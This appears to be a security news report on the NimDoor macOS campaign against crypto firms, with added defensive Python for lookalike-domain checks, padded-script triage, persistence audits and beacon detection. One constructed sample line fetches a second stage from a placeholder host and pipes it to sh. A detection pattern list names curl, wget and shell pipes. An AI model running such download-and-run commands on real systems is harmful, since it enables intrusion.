A new cyberattack campaign attributed to North Korean hackers has been uncovered, with cybersecurity researchers describing a calculated malware operation targeting the Web3 and cryptocurrency sectors. Dubbed NimDoor, after the unusual Nim-compiled binaries at its core, the campaign combines social engineering over chat platforms with a multi-stage payload built specifically for macOS.
Fake Zoom Updates Conceal Malicious Payloads
According to findings from SentinelLabs, the attackers initially approach their targets by impersonating familiar contacts on messaging platforms such as Telegram. After establishing trust, victims are coaxed into scheduling meetings via Calendly and are then sent links to download what appears to be a necessary Zoom update. These spoofed update prompts are hosted on domains crafted to resemble genuine Zoom infrastructure: examples include support.us05web-zoom.forum and support.us05web-zoom.cloud, which echo the look of real Zoom meeting hosts such as us05web.zoom.us while sitting under entirely unrelated registered domains. The giveaway is that the registered domain is not zoom.us; the word "zoom" appears only inside a hyphenated label.
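The distinction between a real Zoom host and a lookalike is a label-aware check on the registered domain, not a search for the string "zoom". The following is an added example (not code from the page or from SentinelLabs) of a classifier a chat-link filter could apply; the allow-list of Zoom domains and all sample URLs are assumptions for illustration, and it also catches two tricks the article does not mention, a zoom.us prefix on an unrelated domain and a "zoom.us@" userinfo prefix.

```python
from urllib.parse import urlsplit

# Registrable domains Zoom actually uses for meeting links and downloads.
# Assumption: this allow-list is an illustration; check it against your own policy.
LEGIT_ZOOM_DOMAINS = ("zoom.us", "zoom.com")


def host_of(url: str):
    """Return (lowercase hostname, has_userinfo) for a URL, tolerating a missing scheme."""
    if "://" not in url:
        url = "https://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    return host, parts.username is not None


def under_domain(host: str, domain: str) -> bool:
    """Label-aware suffix test: 'zoom.us.evil.invalid' is NOT under 'zoom.us'."""
    return host == domain or host.endswith("." + domain)


def classify_zoom_link(url: str) -> str:
    """Classify a link as 'legitimate', 'lookalike' or 'unrelated' with respect to Zoom."""
    host, has_userinfo = host_of(url)
    if has_userinfo:
        # https://zoom.us@evil.invalid/ reads as Zoom to a skimming eye but connects elsewhere.
        return "lookalike"
    if any(under_domain(host, d) for d in LEGIT_ZOOM_DOMAINS):
        return "legitimate"
    # "zoom" anywhere in a label that is not the registered domain, e.g. us05web-zoom.forum
    # or zoom.us.evil.invalid, is a lookalike.
    if "zoom" in host:
        return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for sample in ("https://us05web.zoom.us/j/1234567890",
                   "https://support.us05web-zoom.forum/zoom_sdk_support",
                   "https://zoom.us.evil.invalid/update",
                   "https://zoom.us@evil.invalid/"):
        print(sample, "->", classify_zoom_link(sample))
```

Note that the check deliberately ignores the path: a lure can put "zoom" anywhere after the slash, so only the host decides the verdict.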
The malicious files, masquerading as Zoom SDK support scripts, are padded with thousands of lines of whitespace. The padding obscures the script's real function at a glance and makes it look like a large, ordinary piece of software. Buried at the end of the bloated file are just three live lines of code, which download and execute the next stage from servers under the attackers' control.
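A file that is almost entirely whitespace with a downloader in its last few lines is easy to spot once you measure it. The block below is an added example (not from the page or from SentinelLabs) of that triage heuristic: it reports the blank-line ratio, pulls out the last live lines and looks for downloader idioms in them. The sample scripts are constructed to match the shape the article describes; the host and paths in them are placeholders, not real indicators.

```python
import re

# Strings that, in the live tail of a whitespace-padded script, suggest a downloader.
# Assumption: tuned for AppleScript/shell droppers; extend for other interpreters.
DOWNLOADER_PATTERNS = (
    r"do shell script",
    r"\bcurl\b",
    r"\bwget\b",
    r"\bosascript\b",
    r"\|\s*(?:ba|z)?sh\b",
)


def analyze_script(text: str, min_blank_ratio: float = 0.95, tail_lines: int = 5) -> dict:
    """Summarise how much of a script is whitespace and what its last live lines do."""
    lines = text.splitlines()
    live = [line for line in lines if line.strip()]
    blank_ratio = 1.0 - len(live) / len(lines) if lines else 0.0
    tail = live[-tail_lines:]
    hits = sorted({pat for pat in DOWNLOADER_PATTERNS for line in tail if re.search(pat, line)})
    return {
        "total_lines": len(lines),
        "live_lines": len(live),
        "blank_ratio": round(blank_ratio, 4),
        "tail": tail,
        "downloader_hits": hits,
        "suspicious": blank_ratio >= min_blank_ratio and bool(hits),
    }


# Constructed sample in the shape the report describes: thousands of blank lines, then a few
# live lines that fetch and run a second stage (host and paths are placeholders, not real IOCs).
PADDED_SAMPLE = "\n" * 10000 + "\n".join([
    'set stage to "https://support.us05web-zoom.invalid/s"',
    'do shell script "curl -s -k " & quoted form of stage & " | sh"',
    'open location "https://zoom.us/"',
])

# Constructed benign script for comparison.
BENIGN_SAMPLE = "\n".join([
    'tell application "zoom.us"',
    "    activate",
    "end tell",
])


if __name__ == "__main__":
    for name, sample in (("padded", PADDED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze_script(sample))
```

The two numbers worth alerting on together are a blank ratio above roughly 0.95 and a downloader idiom in the tail; either alone produces false positives (generated code is often mostly whitespace, and plenty of legitimate installers call curl).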
Broad Campaign with Customized Domains
Researchers noted that the operation appears to be extensive, with multiple domains concurrently targeting various victims. Each domain is customised for an individual target, suggesting a broad yet coordinated campaign. SentinelLabs also highlighted a misspelling in the lure, "Zook SDK Update" in place of "Zoom SDK Update"; whether it was a crude way to dodge exact-match string detection or simply a mistake, the typo gave researchers a distinctive string with which to track the campaign's activity.
Upon execution, the script opens a legitimate Zoom page in the victim's browser while the malware is deployed in the background. The tactic is meant to reassure the user that a routine update is under way while the payload quietly installs its components.
Dual-Pronged Attack Strategy
Once installed, NimDoor follows a two-path strategy. The first component harvests sensitive data: stored login credentials and browsing history from popular browsers including Chrome, Firefox, Edge, Brave and Arc, credentials held in the macOS Keychain, and the user's shell command history, which reveals what the victim has previously done on the system.
The second component establishes long-term access: it registers a LaunchAgent so that its agent process is started at every login and runs quietly in the background. Telegram data is a particular focus, with the malware collecting the encrypted local message database together with the key material needed to decrypt it offline.
Collected data is first staged in hidden folders under innocuous file names and later uploaded to attacker-controlled servers over encrypted channels. The transfers are shaped to look like routine web traffic, which further reduces the chance of detection.
Advanced Evasion and Persistent Access
Written largely in Nim and C++, with AppleScript and shell scripts for the earlier stages, the malware is awkward for conventional security tooling: Nim is rarely used in macOS malware, so its compiled output matches few existing signatures and is less familiar to analysts. Its design also leans on legitimate macOS features, LaunchAgents in particular, to hide in plain sight and to survive reboots and attempts at removal.
The persistence is signal-based. The agent installs handlers for SIGINT and SIGTERM, the signals delivered by an ordinary kill command, by logout and by shutdown. Instead of exiting, the handler rewrites the malware's components and its LaunchAgent plist into concealed directories, so a conventional kill or a restart simply triggers a fresh install. The practical consequence for responders is that the on-disk components and the LaunchAgent must be removed before the process is stopped, and the process should be stopped with SIGKILL, which cannot be caught.
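The difference between a catchable termination signal and SIGKILL is the whole story of why naive clean-up fails. The block below is an added, benign demonstration (not NimDoor code and not from the page or SentinelLabs): a stand-in "agent" keeps a marker file on disk and re-creates it from a SIGINT/SIGTERM handler, and the driver plays the part of a responder who deletes the file and then kills the process. The agent script, marker name and timeouts are all assumptions for the demonstration.

```python
import os
import signal
import subprocess
import sys
import tempfile
import time

# Stand-in for the agent (benign): keeps a marker file on disk and re-creates it from a
# SIGINT/SIGTERM handler instead of exiting. Names and paths are placeholders.
AGENT = r"""
import os, signal, sys, time
marker = sys.argv[1]

def reinstall(*_):
    # The real agent rewrites its binaries and LaunchAgent plist here.
    with open(marker, "w") as fh:
        fh.write("re-created by signal handler\n")

signal.signal(signal.SIGINT, reinstall)
signal.signal(signal.SIGTERM, reinstall)
reinstall()
open(marker + ".ready", "w").close()   # tell the parent the handlers are armed
while True:
    time.sleep(0.05)
"""


def wait_for(cond, timeout: float) -> bool:
    """Poll `cond` until it is true or `timeout` seconds pass."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if cond():
            return True
        time.sleep(0.02)
    return cond()


def removal_attempt(signal_name: str) -> dict:
    """Delete the agent's on-disk component, send the named signal, report what happened."""
    sig = getattr(signal, signal_name)
    marker = os.path.join(tempfile.mkdtemp(), "agent.component")  # hypothetical path
    proc = subprocess.Popen([sys.executable, "-c", AGENT, marker])
    try:
        if not wait_for(lambda: os.path.exists(marker + ".ready"), 10.0):
            raise RuntimeError("agent did not start")
        os.remove(marker)                      # the naive clean-up step...
        proc.send_signal(sig)                  # ...followed by the naive kill
        restored = wait_for(lambda: os.path.exists(marker), 2.0)
        try:
            proc.wait(timeout=1.0)
            survived = False
        except subprocess.TimeoutExpired:
            survived = True
    finally:
        if proc.poll() is None:
            proc.kill()
            proc.wait()
    return {"signal": signal_name, "survived": survived, "component_restored": restored}


if __name__ == "__main__":
    print(removal_attempt("SIGTERM"))   # agent survives and the component comes back
    print(removal_attempt("SIGKILL"))   # agent dies and the component stays gone
```

The order of operations matters as much as the signal: unload the LaunchAgent and delete the dropped files first, then SIGKILL the process. Doing it the other way round, with SIGKILL, still works for this toy agent, but a real one may have a second process watching the first.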
Deceptive naming further complicates detection. The malware writes its components into folders whose names imitate trusted vendors, for instance a "Google" directory spelled with a capital I in place of the lowercase l, a substitution that is invisible in many fonts. These components are registered as LaunchAgents so that they start at every login and keep running.
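A persistence audit can catch this class of naming trick mechanically: fold confusable characters (I/l, 1/l, 0/o) before comparing a LaunchAgent's label and program path against vendor names, and flag anything that matches only after folding. The block below is an added example (not from the page or from SentinelLabs) using only the standard library; the vendor list, the confusable table and both sample plists are assumptions constructed for the demonstration, not real artefacts from the campaign.

```python
import plistlib
import re
import unicodedata

# Vendor names a persistence item would plausibly be dressed up as.
# Assumption: illustrative list; extend for the software present on your fleet.
TRUSTED_NAMES = ("Google", "Google LLC", "Apple", "Zoom")

# Characters that render alike in common UI fonts, folded to one canonical form.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})


def fold(name: str) -> str:
    """Collapse look-alike spellings onto one string."""
    return unicodedata.normalize("NFKC", name).translate(CONFUSABLES).lower()


def lookalike_findings(candidates) -> list:
    """Names that equal a trusted vendor only after confusable folding (exact matches are fine)."""
    findings = []
    for cand in candidates:
        for trusted in TRUSTED_NAMES:
            if cand.lower() != trusted.lower() and fold(cand) == fold(trusted):
                findings.append(f"{cand!r} imitates {trusted!r}")
    return findings


def assess_launch_agent(plist_bytes: bytes) -> dict:
    """Inspect one LaunchAgent plist for vendor-imitating names and auto-start settings."""
    pl = plistlib.loads(plist_bytes)
    label = str(pl.get("Label", ""))
    args = pl.get("ProgramArguments") or []
    program = str(pl.get("Program") or (args[0] if args else ""))
    # Examine the whole label and path plus every dot/slash-separated component of each.
    candidates = list(dict.fromkeys(
        [label, program] + [t for s in (label, program) for t in re.split(r"[./]", s) if t]
    ))
    findings = lookalike_findings(candidates)
    return {
        "label": label,
        "program": program,
        "run_at_load": bool(pl.get("RunAtLoad", False)),
        "keep_alive": bool(pl.get("KeepAlive", False)),
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed plist imitating a Google updater with a capital I for the l (hypothetical paths).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.googIe.update</string>
  <key>ProgramArguments</key>
  <array><string>/Users/alice/Library/Application Support/GoogIe LLC/agent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed benign plist: spelled correctly, so it must not be flagged.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array><string>/Users/alice/Library/Google/GoogleSoftwareUpdate/Contents/MacOS/GoogleSoftwareUpdateAgent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


if __name__ == "__main__":
    for data in (SUSPICIOUS_PLIST, BENIGN_PLIST):
        print(assess_launch_agent(data))
```

On a real host, run the assessment over every file in ~/Library/LaunchAgents and /Library/LaunchAgents and review anything flagged together with its RunAtLoad and KeepAlive settings; a vendor-imitating name that is also kept alive is exactly the combination the article describes.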
Another notable component is a beacon that contacts the attackers' servers every 30 seconds, reporting on system activity and waiting for remote commands. To evade sandboxes and short-lived analysis, it sleeps for 10 minutes before becoming fully active, mimicking the behaviour of sluggish but benign software.
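A fixed 30-second check-in is a textbook beacon, and beacons are found by looking at the regularity of a flow's inter-arrival times rather than at any single connection. The block below is an added detection example (not from the page or from SentinelLabs) that groups a connection log by source and destination, computes the mean interval and relative jitter per flow, and flags flows with low jitter. The log is constructed inline: one flow checks in every 30 seconds with about a second of jitter, the other is a person browsing; the hostnames, addresses and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev


def build_sample_log() -> str:
    """Constructed connection log (not real telemetry): 'timestamp,source,destination' per line."""
    t0 = datetime(2025, 7, 1, 10, 0, 0, tzinfo=timezone.utc)
    rows = []
    for i in range(20):                                   # beacon: 30 s period, jitter -1..+1 s
        ts = t0 + timedelta(seconds=30 * i + (i % 3) - 1)
        rows.append((ts, "macbook-01", "198.51.100.7:443"))
    t = t0
    for gap in (2, 45, 3, 300, 7, 120, 1, 60, 900, 4):    # browsing: irregular gaps
        t += timedelta(seconds=gap)
        rows.append((t, "macbook-01", "203.0.113.9:443"))
    rows.sort()
    return "\n".join(f"{ts.strftime('%Y-%m-%dT%H:%M:%SZ')},{src},{dst}" for ts, src, dst in rows)


def parse_log(text: str) -> dict:
    """Group epoch timestamps by (source, destination) flow."""
    flows = defaultdict(list)
    for line in text.strip().splitlines():
        ts, src, dst = (field.strip() for field in line.split(","))
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        flows[(src, dst)].append(when.timestamp())
    return flows


def beacon_stats(times, min_events: int = 8):
    """Mean interval and relative jitter (std/mean) of a flow's inter-arrival times."""
    times = sorted(times)
    if len(times) < min_events:
        return None
    deltas = [b - a for a, b in zip(times, times[1:])]
    avg = mean(deltas)
    if avg <= 0:
        return None
    return {"events": len(times), "interval_s": round(avg, 2), "jitter": round(pstdev(deltas) / avg, 3)}


def find_beacons(text: str, max_jitter: float = 0.10, min_events: int = 8) -> list:
    """Flows whose inter-arrival times are regular enough to look machine-driven."""
    hits = []
    for (src, dst), times in parse_log(text).items():
        stats = beacon_stats(times, min_events)
        if stats and stats["jitter"] <= max_jitter:
            hits.append({"src": src, "dst": dst, **stats})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(build_sample_log()):
        print(hit)
```

Two caveats follow from the article's own details: a 10-minute start-up delay means a short sandbox run or a brief capture window sees nothing, so the window has to be long enough to collect a handful of intervals; and the threshold on jitter trades false positives (software update checks are also regular) against missed beacons that add randomised sleep.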
Significant Risk to Crypto and Web3 Ecosystem
The level of stealth and resilience built into NimDoor has raised concerns across the cybersecurity community. Removing it typically requires an experienced responder, because the LaunchAgent and on-disk copies have to be removed before the process is stopped, or the infection reinstalls itself. With its focus on stealing encrypted communications, financial data and personal credentials, the campaign poses a significant threat to professionals and organisations operating in the blockchain and digital asset space.